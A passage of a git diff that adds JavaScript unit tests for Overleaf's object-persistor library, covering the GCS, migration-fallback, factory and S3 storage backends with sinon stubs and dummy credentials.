expect(GcsBucket.getFiles).to.have.been.calledWith({ + prefix: `${key}/`, + }) + }) + + it('should return the directory size', function () { + expect(size).to.equal(filesSize) + }) + }) + + describe('when there are no files', function () { + let size + + beforeEach(async function () { + GcsBucket.getFiles.resolves([[]]) + size = await GcsPersistor.directorySize(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.getFiles).to.have.been.calledWith({ + prefix: `${key}/`, + }) + }) + + it('should return zero', function () { + expect(size).to.equal(0) + }) + }) + + describe('when there is an error listing the objects', function () { + let error + + beforeEach(async function () { + GcsBucket.getFiles.rejects(genericError) + try { + await GcsPersistor.directorySize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('checkIfObjectExists', function () { + describe('when the file exists', function () { + let exists + + beforeEach(async function () { + exists = await GcsPersistor.checkIfObjectExists(bucket, key) + }) + + it('should ask the file if it exists', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.exists).to.have.been.called + }) + + it('should return that the file exists', function () { + expect(exists).to.equal(true) + }) + }) + + describe('when the file does not exist', function () { + let exists + + beforeEach(async function () { + GcsFile.exists = sinon.stub().resolves([false]) + exists = await GcsPersistor.checkIfObjectExists(bucket, key) + }) + + it('should get the object header', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.exists).to.have.been.called + }) + + it('should return that the file does not exist', function () { + expect(exists).to.equal(false) + }) + }) + + describe('when there is an error', function () { + let error + + beforeEach(async function () { + GcsFile.exists = sinon.stub().rejects(genericError) + try { + await GcsPersistor.checkIfObjectExists(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) +}) diff --git a/libraries/object-persistor/test/unit/MigrationPersistorTests.js b/libraries/object-persistor/test/unit/MigrationPersistorTests.js new file mode 100644 index 0000000..a37aa53 --- /dev/null +++ b/libraries/object-persistor/test/unit/MigrationPersistorTests.js @@ -0,0 +1,532 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../src/MigrationPersistor.js' +const SandboxedModule = require('sandboxed-module') + +const Errors = require('../../src/Errors') + +// Not all methods are tested here, but a method with each type of wrapping has +// tests. Specifically, the following wrapping methods are tested here: +// getObjectStream: _wrapFallbackMethod +// sendStream: forward-to-primary +// deleteObject: _wrapMethodOnBothPersistors +// copyObject: copyFileWithFallback + +describe('MigrationPersistorTests', function () { + const bucket = 'womBucket' + const fallbackBucket = 'bucKangaroo' + const key = 'monKey' + const destKey = 'donKey' + const genericError = new Error('guru meditation error') + const notFoundError = new Errors.NotFoundError('not found') + const size = 33 + const md5 = 'ffffffff' + + let Settings, + Logger, + Stream, + StreamPromises, + MigrationPersistor, + fileStream, + newPersistor + + beforeEach(function () { + fileStream = { + name: 'fileStream', + on: sinon.stub().withArgs('end').yields(), + pipe: sinon.stub(), + } + + newPersistor = function (hasFile) { + return { + sendFile: sinon.stub().resolves(), + sendStream: sinon.stub().resolves(), + getObjectStream: hasFile + ? sinon.stub().resolves(fileStream) + : sinon.stub().rejects(notFoundError), + deleteDirectory: sinon.stub().resolves(), + getObjectSize: hasFile + ? sinon.stub().resolves(size) + : sinon.stub().rejects(notFoundError), + deleteObject: sinon.stub().resolves(), + copyObject: hasFile + ? sinon.stub().resolves() + : sinon.stub().rejects(notFoundError), + checkIfObjectExists: sinon.stub().resolves(hasFile), + directorySize: hasFile + ? sinon.stub().resolves(size) + : sinon.stub().rejects(notFoundError), + getObjectMd5Hash: hasFile + ? sinon.stub().resolves(md5) + : sinon.stub().rejects(notFoundError), + } + } + + Settings = { + buckets: { + [bucket]: fallbackBucket, + }, + } + + Stream = { + PassThrough: sinon.stub(), + } + + StreamPromises = { + pipeline: sinon.stub().resolves(), + } + + Logger = { + warn: sinon.stub(), + } + + MigrationPersistor = SandboxedModule.require(modulePath, { + requires: { + stream: Stream, + 'stream/promises': StreamPromises, + './Errors': Errors, + '@overleaf/logger': Logger, + }, + globals: { console }, + }) + }) + + describe('getObjectStream', function () { + const options = { wombat: 'potato' } + describe('when the primary persistor has the file', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, response + beforeEach(async function () { + primaryPersistor = newPersistor(true) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + response = await migrationPersistor.getObjectStream( + bucket, + key, + options + ) + }) + + it('should return the file stream', function () { + expect(response).to.equal(fileStream) + }) + + it('should fetch the file from the primary persistor, with the correct options', function () { + expect(primaryPersistor.getObjectStream).to.have.been.calledWithExactly( + bucket, + key, + options + ) + }) + + it('should not query the fallback persistor', function () { + expect(fallbackPersistor.getObjectStream).not.to.have.been.called + }) + }) + + describe('when the fallback persistor has the file', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, response + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(true) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + response = await migrationPersistor.getObjectStream( + bucket, + key, + options + ) + }) + + it('should return the file stream', function () { + expect(response).to.be.an.instanceOf(Stream.PassThrough) + }) + + it('should fetch the file from the primary persistor with the correct options', function () { + expect(primaryPersistor.getObjectStream).to.have.been.calledWithExactly( + bucket, + key, + options + ) + }) + + it('should fetch the file from the fallback persistor with the fallback bucket with the correct options', function () { + expect( + fallbackPersistor.getObjectStream + ).to.have.been.calledWithExactly(fallbackBucket, key, options) + }) + + it('should create one read stream', function () { + expect(fallbackPersistor.getObjectStream).to.have.been.calledOnce + }) + + it('should not send the file to the primary', function () { + expect(primaryPersistor.sendStream).not.to.have.been.called + }) + }) + + describe('when the file should be copied to the primary', function () { + let primaryPersistor, + fallbackPersistor, + migrationPersistor, + returnedStream + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(true) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + Settings.copyOnMiss = true + returnedStream = await migrationPersistor.getObjectStream( + bucket, + key, + options + ) + }) + + it('should create one read stream', function () { + expect(fallbackPersistor.getObjectStream).to.have.been.calledOnce + }) + + it('should get the md5 hash from the source', function () { + expect(fallbackPersistor.getObjectMd5Hash).to.have.been.calledWith( + fallbackBucket, + key + ) + }) + + it('should send a stream to the primary', function () { + expect(primaryPersistor.sendStream).to.have.been.calledWithExactly( + bucket, + key, + sinon.match.instanceOf(Stream.PassThrough), + { sourceMd5: md5 } + ) + }) + + it('should send a stream to the client', function () { + expect(returnedStream).to.be.an.instanceOf(Stream.PassThrough) + }) + }) + + describe('when neither persistor has the file', function () { + it('rejects with a NotFoundError', async function () { + const migrationPersistor = new MigrationPersistor( + newPersistor(false), + newPersistor(false), + Settings + ) + await expect( + migrationPersistor.getObjectStream(bucket, key) + ).to.eventually.be.rejected.and.be.an.instanceOf(Errors.NotFoundError) + }) + }) + + describe('when the primary persistor throws an unexpected error', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, error + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(true) + primaryPersistor.getObjectStream = sinon.stub().rejects(genericError) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + try { + await migrationPersistor.getObjectStream(bucket, key, options) + } catch (err) { + error = err + } + }) + + it('rejects with the error', function () { + expect(error).to.equal(genericError) + }) + + it('does not call the fallback', function () { + expect(fallbackPersistor.getObjectStream).not.to.have.been.called + }) + }) + + describe('when the fallback persistor throws an unexpected error', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, error + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(false) + fallbackPersistor.getObjectStream = sinon.stub().rejects(genericError) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + try { + await migrationPersistor.getObjectStream(bucket, key, options) + } catch (err) { + error = err + } + }) + + it('rejects with the error', function () { + expect(error).to.equal(genericError) + }) + + it('should have called the fallback', function () { + expect(fallbackPersistor.getObjectStream).to.have.been.calledWith( + fallbackBucket, + key + ) + }) + }) + }) + + describe('sendStream', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor + beforeEach(function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + }) + + describe('when it works', function () { + beforeEach(async function () { + return migrationPersistor.sendStream(bucket, key, fileStream) + }) + + it('should send the file to the primary persistor', function () { + expect(primaryPersistor.sendStream).to.have.been.calledWithExactly( + bucket, + key, + fileStream + ) + }) + + it('should not send the file to the fallback persistor', function () { + expect(fallbackPersistor.sendStream).not.to.have.been.called + }) + }) + + describe('when the primary persistor throws an error', function () { + it('returns the error', async function () { + primaryPersistor.sendStream.rejects(notFoundError) + await expect( + migrationPersistor.sendStream(bucket, key, fileStream) + ).to.eventually.be.rejected.and.be.an.instanceOf(Errors.NotFoundError) + }) + }) + }) + + describe('deleteObject', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor + beforeEach(function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + }) + + describe('when it works', function () { + beforeEach(async function () { + return migrationPersistor.deleteObject(bucket, key) + }) + + it('should delete the file from the primary', function () { + expect(primaryPersistor.deleteObject).to.have.been.calledWithExactly( + bucket, + key + ) + }) + + it('should delete the file from the fallback', function () { + expect(fallbackPersistor.deleteObject).to.have.been.calledWithExactly( + fallbackBucket, + key + ) + }) + }) + + describe('when the primary persistor throws an error', function () { + let error + beforeEach(async function () { + primaryPersistor.deleteObject.rejects(genericError) + try { + await migrationPersistor.deleteObject(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return the error', function () { + expect(error).to.equal(genericError) + }) + + it('should delete the file from the primary', function () { + expect(primaryPersistor.deleteObject).to.have.been.calledWithExactly( + bucket, + key + ) + }) + + it('should delete the file from the fallback', function () { + expect(fallbackPersistor.deleteObject).to.have.been.calledWithExactly( + fallbackBucket, + key + ) + }) + }) + + describe('when the fallback persistor throws an error', function () { + let error + beforeEach(async function () { + fallbackPersistor.deleteObject.rejects(genericError) + try { + await migrationPersistor.deleteObject(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return the error', function () { + expect(error).to.equal(genericError) + }) + + it('should delete the file from the primary', function () { + expect(primaryPersistor.deleteObject).to.have.been.calledWithExactly( + bucket, + key + ) + }) + + it('should delete the file from the fallback', function () { + expect(fallbackPersistor.deleteObject).to.have.been.calledWithExactly( + fallbackBucket, + key + ) + }) + }) + }) + + describe('copyObject', function () { + describe('when the file exists on the primary', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor + beforeEach(async function () { + primaryPersistor = newPersistor(true) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + return migrationPersistor.copyObject(bucket, key, destKey) + }) + + it('should call copyObject to copy the file', function () { + expect(primaryPersistor.copyObject).to.have.been.calledWithExactly( + bucket, + key, + destKey + ) + }) + + it('should not try to read from the fallback', function () { + expect(fallbackPersistor.getObjectStream).not.to.have.been.called + }) + }) + + describe('when the file does not exist on the primary', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(true) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + return migrationPersistor.copyObject(bucket, key, destKey) + }) + + it('should call copyObject to copy the file', function () { + expect(primaryPersistor.copyObject).to.have.been.calledWithExactly( + bucket, + key, + destKey + ) + }) + + it('should fetch the file from the fallback', function () { + expect( + fallbackPersistor.getObjectStream + ).not.to.have.been.calledWithExactly(fallbackBucket, key) + }) + + it('should get the md5 hash from the source', function () { + expect(fallbackPersistor.getObjectMd5Hash).to.have.been.calledWith( + fallbackBucket, + key + ) + }) + + it('should send the file to the primary', function () { + expect(primaryPersistor.sendStream).to.have.been.calledWithExactly( + bucket, + destKey, + sinon.match.instanceOf(Stream.PassThrough), + { sourceMd5: md5 } + ) + }) + }) + + describe('when the file does not exist on the fallback', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, error + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + try { + await migrationPersistor.copyObject(bucket, key, destKey) + } catch (err) { + error = err + } + }) + + it('should call copyObject to copy the file', function () { + expect(primaryPersistor.copyObject).to.have.been.calledWithExactly( + bucket, + key, + destKey + ) + }) + + it('should fetch the file from the fallback', function () { + expect( + fallbackPersistor.getObjectStream + ).not.to.have.been.calledWithExactly(fallbackBucket, key) + }) + + it('should return a not-found error', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + }) + }) +}) diff --git a/libraries/object-persistor/test/unit/PersistorFactoryTests.js b/libraries/object-persistor/test/unit/PersistorFactoryTests.js new file mode 100644 index 0000000..7f71be8 --- /dev/null +++ b/libraries/object-persistor/test/unit/PersistorFactoryTests.js @@ -0,0 +1,102 @@ +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') +const StreamPromises = require('node:stream/promises') + +const MODULE_PATH = '../../src/PersistorFactory.js' + +describe('PersistorManager', function () { + let PersistorFactory, FSPersistor, S3Persistor, Settings, GcsPersistor + + beforeEach(function () { + FSPersistor = class { + constructor(settings) { + this.settings = settings + } + + wrappedMethod() { + return 'FSPersistor' + } + } + S3Persistor = class { + wrappedMethod() { + return 'S3Persistor' + } + } + GcsPersistor = class { + wrappedMethod() { + return 'GcsPersistor' + } + } + + Settings = {} + const requires = { + './GcsPersistor': GcsPersistor, + './S3Persistor': { S3Persistor }, + './FSPersistor': FSPersistor, + '@overleaf/logger': { + info() {}, + err() {}, + }, + 'stream/promises': StreamPromises, + } + PersistorFactory = SandboxedModule.require(MODULE_PATH, { requires }) + }) + + it('should implement the S3 wrapped method when S3 is configured', function () { + Settings.backend = 's3' + + expect(PersistorFactory(Settings)).to.respondTo('wrappedMethod') + expect(PersistorFactory(Settings).wrappedMethod()).to.equal('S3Persistor') + }) + + it("should implement the S3 wrapped method when 'aws-sdk' is configured", function () { + Settings.backend = 'aws-sdk' + + expect(PersistorFactory(Settings)).to.respondTo('wrappedMethod') + expect(PersistorFactory(Settings).wrappedMethod()).to.equal('S3Persistor') + }) + + it('should implement the FS wrapped method when FS is configured', function () { + Settings.backend = 'fs' + + expect(PersistorFactory(Settings)).to.respondTo('wrappedMethod') + expect(PersistorFactory(Settings).wrappedMethod()).to.equal('FSPersistor') + }) + + it('should forward useSubdirectories=true to FSPersistor', function () { + Settings.backend = 'fs' + Settings.useSubdirectories = true + + expect(PersistorFactory(Settings).settings.useSubdirectories).to.be.true + }) + + it('should forward useSubdirectories=false to FSPersistor', function () { + Settings.backend = 'fs' + Settings.useSubdirectories = false + + expect(PersistorFactory(Settings).settings.useSubdirectories).to.be.false + }) + + it('should throw an error when the backend is not configured', function () { + try { + PersistorFactory(Settings) + } catch (err) { + expect(err.message).to.equal('no backend specified - config incomplete') + return + } + expect('should have caught an error').not.to.exist + }) + + it('should throw an error when the backend is unknown', function () { + Settings.backend = 'magic' + try { + PersistorFactory(Settings) + } catch (err) { + expect(err.message).to.equal('unknown backend') + expect(err.info.backend).to.equal('magic') + return + } + expect('should have caught an error').not.to.exist + }) +}) diff --git a/libraries/object-persistor/test/unit/S3PersistorTests.js b/libraries/object-persistor/test/unit/S3PersistorTests.js new file mode 100644 index 0000000..822a4ac --- /dev/null +++ b/libraries/object-persistor/test/unit/S3PersistorTests.js @@ -0,0 +1,1048 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../src/Errors') +const { EventEmitter } = require('node:events') + +const MODULE_PATH = '../../src/S3Persistor.js' + +describe('S3PersistorTests', function () { + const defaultS3Key = 'frog' + const defaultS3Secret = 'prince' + const defaultS3Credentials = { + credentials: { + accessKeyId: defaultS3Key, + secretAccessKey: defaultS3Secret, + }, + } + const filename = '/wombat/potato.tex' + const bucket = 'womBucket' + const key = 'monKey' + const destKey = 'donKey' + const objectSize = 5555 + const genericError = new Error('guru meditation error') + const files = [ + { Key: 'llama', Size: 11 }, + { Key: 'hippo', Size: 22 }, + ] + const filesSize = 33 + const md5 = 'ffffffff00000000ffffffff00000000' + const redirectUrl = 'https://wombat.potato/giraffe' + + let Logger, + Transform, + PassThrough, + S3, + Fs, + ReadStream, + Stream, + StreamPromises, + S3GetObjectRequest, + S3Persistor, + S3Client, + S3NotFoundError, + S3AccessDeniedError, + FileNotFoundError, + EmptyPromise, + settings, + Hash, + crypto + + beforeEach(function () { + settings = { + secret: defaultS3Secret, + key: defaultS3Key, + partSize: 100 * 1024 * 1024, + } + + Transform = class { + once() {} + } + + PassThrough = class {} + + Stream = { + Transform, + PassThrough, + pipeline: sinon.stub().yields(), + } + + StreamPromises = { + pipeline: sinon.stub().resolves(), + } + + EmptyPromise = { + promise: sinon.stub().resolves(), + } + + ReadStream = new EventEmitter() + class FakeS3GetObjectRequest extends EventEmitter { + constructor() { + super() + this.statusCode = 200 + this.err = null + this.aborted = false + } + + abort() { + this.aborted = true + } + + createReadStream() { + setTimeout(() => { + if (this.notFoundSSEC) { + // special case for AWS S3: 404 NoSuchKey wrapped in a 400. A single request received a single response, and multiple httpHeaders events are triggered. Don't ask. + this.emit('httpHeaders', 400, {}) + this.emit('httpHeaders', 404, {}) + ReadStream.emit('error', S3NotFoundError) + return + } + + if (this.err) return ReadStream.emit('error', this.err) + this.emit('httpHeaders', this.statusCode, {}) + if (this.statusCode === 403) { + ReadStream.emit('error', S3AccessDeniedError) + } + if (this.statusCode === 404) { + ReadStream.emit('error', S3NotFoundError) + } + }) + return ReadStream + } + } + S3GetObjectRequest = new FakeS3GetObjectRequest() + + FileNotFoundError = new Error('File not found') + FileNotFoundError.code = 'ENOENT' + + Fs = { + createReadStream: sinon.stub().returns(ReadStream), + } + + S3NotFoundError = new Error('not found') + S3NotFoundError.code = 'NoSuchKey' + + S3AccessDeniedError = new Error('access denied') + S3AccessDeniedError.code = 'AccessDenied' + + S3Client = { + getObject: sinon.stub().returns(S3GetObjectRequest), + headObject: sinon.stub().returns({ + promise: sinon.stub().resolves({ + ContentLength: objectSize, + ETag: md5, + }), + }), + listObjectsV2: sinon.stub().returns({ + promise: sinon.stub().resolves({ + Contents: files, + }), + }), + upload: sinon + .stub() + .returns({ promise: sinon.stub().resolves({ ETag: `"${md5}"` }) }), + copyObject: sinon.stub().returns(EmptyPromise), + deleteObject: sinon.stub().returns(EmptyPromise), + deleteObjects: sinon.stub().returns(EmptyPromise), + getSignedUrlPromise: sinon.stub().resolves(redirectUrl), + } + S3 = sinon.stub().callsFake(() => Object.assign({}, S3Client)) + + Hash = { + end: sinon.stub(), + read: sinon.stub().returns(md5), + setEncoding: sinon.stub(), + } + crypto = { + createHash: sinon.stub().returns(Hash), + } + + Logger = { + warn: sinon.stub(), + } + + S3Persistor = new (SandboxedModule.require(MODULE_PATH, { + requires: { + 'aws-sdk/clients/s3': S3, + '@overleaf/logger': Logger, + './Errors': Errors, + fs: Fs, + stream: Stream, + 'stream/promises': StreamPromises, + crypto, + }, + globals: { console, Buffer }, + }).S3Persistor)(settings) + }) + + describe('getObjectStream', function () { + describe('when called with valid parameters', function () { + let stream + + beforeEach(async function () { + stream = await S3Persistor.getObjectStream(bucket, key) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(PassThrough) + }) + + it('sets the AWS client up with credentials from settings', function () { + expect(S3).to.have.been.calledWith(defaultS3Credentials) + }) + + it('fetches the right key from the right bucket', function () { + expect(S3Client.getObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('pipes the stream through the meter', async function () { + expect(Stream.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Transform), + sinon.match.instanceOf(PassThrough) + ) + }) + + it('does not abort the request', function () { + expect(S3GetObjectRequest.aborted).to.equal(false) + }) + }) + + describe('when called with a byte range', function () { + let stream + + beforeEach(async function () { + stream = await S3Persistor.getObjectStream(bucket, key, { + start: 5, + end: 10, + }) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(Stream.PassThrough) + }) + + it('passes the byte range on to S3', function () { + expect(S3Client.getObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Range: 'bytes=5-10', + }) + }) + }) + + describe('when streaming fails', function () { + let stream + + beforeEach(async function () { + Stream.pipeline.yields(new Error()) + stream = await S3Persistor.getObjectStream(bucket, key) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(Stream.PassThrough) + }) + + it('aborts the request', function () { + expect(S3GetObjectRequest.aborted).to.equal(true) + }) + }) + + describe('when there are alternative credentials', function () { + let stream + const alternativeSecret = 'giraffe' + const alternativeKey = 'hippo' + const alternativeS3Credentials = { + credentials: { + accessKeyId: alternativeKey, + secretAccessKey: alternativeSecret, + }, + } + + beforeEach(async function () { + settings.bucketCreds = {} + settings.bucketCreds[bucket] = { + auth_key: alternativeKey, + auth_secret: alternativeSecret, + } + + stream = await S3Persistor.getObjectStream(bucket, key) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(Stream.PassThrough) + }) + + it('sets the AWS client up with the alternative credentials', function () { + expect(S3).to.have.been.calledWith(alternativeS3Credentials) + }) + + it('fetches the right key from the right bucket', function () { + expect(S3Client.getObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('uses the default credentials for an unknown bucket', async function () { + stream = await S3Persistor.getObjectStream('anotherBucket', key) + + expect(S3).to.have.been.calledTwice + expect(S3.firstCall).to.have.been.calledWith(alternativeS3Credentials) + expect(S3.secondCall).to.have.been.calledWith(defaultS3Credentials) + }) + }) + + describe('without hard-coded credentials', function () { + it('uses the default provider chain', async function () { + delete settings.key + delete settings.secret + + await S3Persistor.getObjectStream(bucket, key) + expect(S3).to.have.been.calledOnce + expect(S3.args[0].credentials).to.not.exist + }) + }) + + describe('when given S3 options', function () { + const httpOptions = { timeout: 2000 } + const maxRetries = 2 + + beforeEach(async function () { + settings.httpOptions = httpOptions + settings.maxRetries = maxRetries + await S3Persistor.getObjectStream(bucket, key) + }) + + it('configures the S3 client appropriately', function () { + expect(S3).to.have.been.calledWithMatch({ httpOptions, maxRetries }) + }) + }) + + describe("when the file doesn't exist", function () { + let error, stream + + beforeEach(async function () { + S3GetObjectRequest.statusCode = 404 + try { + stream = await S3Persistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + + describe("when the file doesn't exist -- SSEC", function () { + let error, stream + + beforeEach(async function () { + S3GetObjectRequest.notFoundSSEC = 404 + try { + stream = await S3Persistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + + describe('when access to the file is denied', function () { + let error, stream + + beforeEach(async function () { + S3GetObjectRequest.statusCode = 403 + try { + stream = await S3Persistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('wraps the error', function () { + expect(error.cause).to.equal(S3AccessDeniedError) + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + + describe('when S3 encounters an unknown error', function () { + let error, stream + + beforeEach(async function () { + S3GetObjectRequest.err = genericError + try { + stream = await S3Persistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + }) + + describe('getRedirectUrl', function () { + let signedUrl + + beforeEach(async function () { + signedUrl = await S3Persistor.getRedirectUrl(bucket, key) + }) + + it('should request a signed URL', function () { + expect(S3Client.getSignedUrlPromise).to.have.been.called + }) + + it('should return the url', function () { + expect(signedUrl).to.equal(redirectUrl) + }) + }) + + describe('getObjectSize', function () { + describe('when called with valid parameters', function () { + let size + + beforeEach(async function () { + size = await S3Persistor.getObjectSize(bucket, key) + }) + + it('should return the object size', function () { + expect(size).to.equal(objectSize) + }) + + it('should pass the bucket and key to S3', function () { + expect(S3Client.headObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + }) + + describe('when the object is not found', function () { + let error + + beforeEach(async function () { + S3Client.headObject = sinon.stub().returns({ + promise: sinon.stub().rejects(S3NotFoundError), + }) + try { + await S3Persistor.getObjectSize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(S3NotFoundError) + }) + }) + + describe('when S3 returns an error', function () { + let error + + beforeEach(async function () { + S3Client.headObject = sinon.stub().returns({ + promise: sinon.stub().rejects(genericError), + }) + try { + await S3Persistor.getObjectSize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('sendStream', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.sendStream(bucket, key, ReadStream) + }) + + it('should upload the stream', function () { + expect(S3Client.upload).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Body: sinon.match.instanceOf(Stream.Transform), + }) + }) + + it('should upload files in a single part', function () { + expect(S3Client.upload).to.have.been.calledWith(sinon.match.any, { + partSize: 100 * 1024 * 1024, + }) + }) + + it('should meter the stream', function () { + expect(Stream.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Stream.Transform) + ) + }) + }) + + describe('when a hash is supplied', function () { + beforeEach(async function () { + return S3Persistor.sendStream(bucket, key, ReadStream, { + sourceMd5: 'aaaaaaaabbbbbbbbaaaaaaaabbbbbbbb', + }) + }) + + it('sends the hash in base64', function () { + expect(S3Client.upload).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Body: sinon.match.instanceOf(Transform), + ContentMD5: 'qqqqqru7u7uqqqqqu7u7uw==', + }) + }) + }) + + describe('when metadata is supplied', function () { + const contentType = 'text/csv' + const contentEncoding = 'gzip' + + beforeEach(async function () { + return S3Persistor.sendStream(bucket, key, ReadStream, { + contentType, + contentEncoding, + }) + }) + + it('sends the metadata to S3', function () { + expect(S3Client.upload).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Body: sinon.match.instanceOf(Transform), + ContentType: contentType, + ContentEncoding: contentEncoding, + }) + }) + }) + + describe('when the upload fails', function () { + let error + beforeEach(async function () { + S3Client.upload = sinon.stub().returns({ + promise: sinon.stub().rejects(genericError), + }) + try { + await S3Persistor.sendStream(bucket, key, ReadStream) + } catch (err) { + error = err + } + }) + + it('throws a WriteError', function () { + expect(error).to.be.an.instanceOf(Errors.WriteError) + }) + }) + }) + + describe('sendFile', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return S3Persistor.sendFile(bucket, key, filename) + }) + + it('should create a read stream for the file', function () { + expect(Fs.createReadStream).to.have.been.calledWith(filename) + }) + + it('should upload the stream', function () { + expect(S3Client.upload).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + Body: sinon.match.instanceOf(Transform), + }) + }) + }) + }) + + describe('getObjectMd5Hash', function () { + describe('when the etag is a valid md5 hash', function () { + let hash + beforeEach(async function () { + hash = await S3Persistor.getObjectMd5Hash(bucket, key) + }) + + it('should return the object hash', function () { + expect(hash).to.equal(md5) + }) + + it('should get the hash from the object metadata', function () { + expect(S3Client.headObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('should not download the object', function () { + expect(S3Client.getObject).not.to.have.been.called + }) + }) + + describe("when the etag isn't a valid md5 hash", function () { + let hash + beforeEach(async function () { + S3Client.headObject = sinon.stub().returns({ + promise: sinon.stub().resolves({ + ETag: 'somethingthatisntanmd5', + Bucket: bucket, + Key: key, + }), + }) + + hash = await S3Persistor.getObjectMd5Hash(bucket, key) + }) + + it('should re-fetch the file to verify it', function () { + expect(S3Client.getObject).to.have.been.calledWith({ + Bucket: bucket, + Key: key, + }) + }) + + it('should calculate the md5 hash from the file', function () { + 